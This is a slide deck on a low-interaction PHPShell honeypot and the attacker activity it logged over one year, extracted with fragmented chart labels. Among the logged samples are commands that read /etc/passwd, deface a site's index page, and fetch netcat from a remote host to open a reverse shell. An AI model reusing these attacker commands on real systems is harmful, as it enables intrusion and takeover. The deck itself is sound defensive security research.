Tales from the Honeypot

Jim Owens

Overview Definitions Setup & deployment Activity: levels & types Tools

Sources Types Samples Analysis

Static analysis Dynamic Analysis

Conclusions

Definitions

Honeypot Real or virtual computer system Appears vulnerable to attack Exists to be exploited (and studied)

Low-interaction honeypot Emulates a vulnerable system Designed to fool attackers for a short time Primary goal is to collect malware tools for

analysis

Setup

PHPShell 1.7 “A shell wrapped in a PHP script…” v1.7 has well-known security issues PHPHOP version

Requires Apache and PHP support Provides a thin layer of functionality Logs activity to text files Downloads malware tools in background (or not)

Setup

Setup PHPHOP logging

IP address hostname query string

pwd (present working directory) command

user agent referer

PHPHOP downloads wget or curl or lynx Downloaded files not accessible to attacker

Deployment

May require script modifications

Transparent links Create on popular pages

Drive search traffic to honeypot

Traffic (MySQL) database & browsing tool Supports sophisticated queries

Simplifies browsing of honeypot traffic

Activity: Oct '06 – Oct '07

10

/5

/2

00

6

11

/4

/2

00

6

11

/2

0/

20

06

12

/6

/2

00

6

12

/2

2/

20

06

1/

7/

20

07

1/

24

/2

00

7

2/

10

/2

00

7

2/

26

/2

00

7

3/

14

/2

00

7

3/

30

/2

00

7

4/

15

/2

00

7

5/

1/

20

07

5/

17

/2

00

7

6/

2/

20

07

6/

18

/2

00

7

7/

4/

20

07

7/

20

/2

00

7

8/

5/

20

07

8/

22

/2

00

7

9/

7/

20

07

9/

23

/2

00

7

10

/9

/2

00

7

0

12

3

4

5

6

7

89

10

11

12

13

14

15

1617

18

19

20

21

22

23

24

Total Hits by Distinct IP

Date

Dis

tin

ct I

Ps

Sample activity types

Curious Destructive Angry Friendly Efficient Guilty Stupid

CuriousSource IP: 88.73.7.239Date: 4/1/2007, 3pm(http://www.google.de/search?q=<"Enable stderr" filetypephp inurl"work_dir")

lscat /etc/passwduname -a

DestructiveSource IP: 201.132.96.174 Date: 4/12/2007, 4pm(http://www.diosdelared.com/foro/index.php?topic=224.15)

echo HACKED BY LaLo PaRa Ti YaReLi>index.php

AngrySource IP: 202.173.224.82Date: 2/15/2007, 7am

lssshsu/sbin/ifconfig/sbin/ifconfig/sbin/ifconfig...(600+ line script probing for vulnerable Web apps & files)...(22 more GETs for various documents actually on server)

FriendlySource IP: 62.129.172.74Date: 2/27/2007, 8am(http://www.google.fr/search?q=PHP Shell 1.7)

id && echo "hi honeypot"ls -al;pwdnetstat -nap --ipls /bin!!! :)cat ~/.bash_history

EfficientSource IP: 136.159.73.4 (ucalgary.ca)Date: 3/9/2007, 1pm

mkdir /var/tmp/...;wget -O /var/tmp/.../nc http://greatsploit.greatnow.com/nc;chmod 755 /var/tmp/.../nc;/var/tmp/.../nc -e /bin/sh 136.159.73.4 10883

GuiltySource IP: 161.139.212.82 (Universiti Teknologi Malaysia)Date: 8/22/2007, 4am(http://www.google.com.my/search?q=allinurlphpshell.php)

echo betik was here.. betik is innocent.. selamat bekerja>betik.txt

StupidSource IP: 68.250.150.179Date: 9/12/2007, 1pm(http://www.google.com/search?q=intitle:"PHP Shell *" &filetype:php)

shell_exec('sudo -u root -S command_goes_here < /home/$User/dir/dir/dir/passfile');

shell_exec("C:\\path\\to\\cmd.exe /c C:\\batchfile.cmd");

Tools

Sources Types

Tools: Sources

Free hosting sites ISP sites “Hacker”/personal sites Malware repositories

Packet storm Milw0rm

Regular old (hacked) Web sites

Tools: Types IRC bot clients Phishing sites (Paypal, Bank of America) Shells (r57, c99, many variants) DDOS tools Backdoors Root exploits Bouncers (psyBNC) Internet game server (Nexuiz) You name it!

Tools: Samples

Backdoor programs bd.py m0rtix.c

Local root exploit prctl.sh

Web site defacement pink-bebek.jpg

Tools: Analysis

Static analysisTechniques that don’t require actually running the tool Review source, if available Identify file type, for binaries Viewing internal strings; Web search may yield

source

Dynamic analysisTechniques used while the tool is running Best done in an instrumented “sandbox”

environment Track network connections attempted Trace system calls and files accessed or created

Conclusions

Low-interaction honeypots: Require little effort to set up/maintain Prove effective in drawing traffic,

even a year after deployment Provide valuable insights into

attackers’ methods and motivations, as well as moments of levity

Collect malware tools for later analysis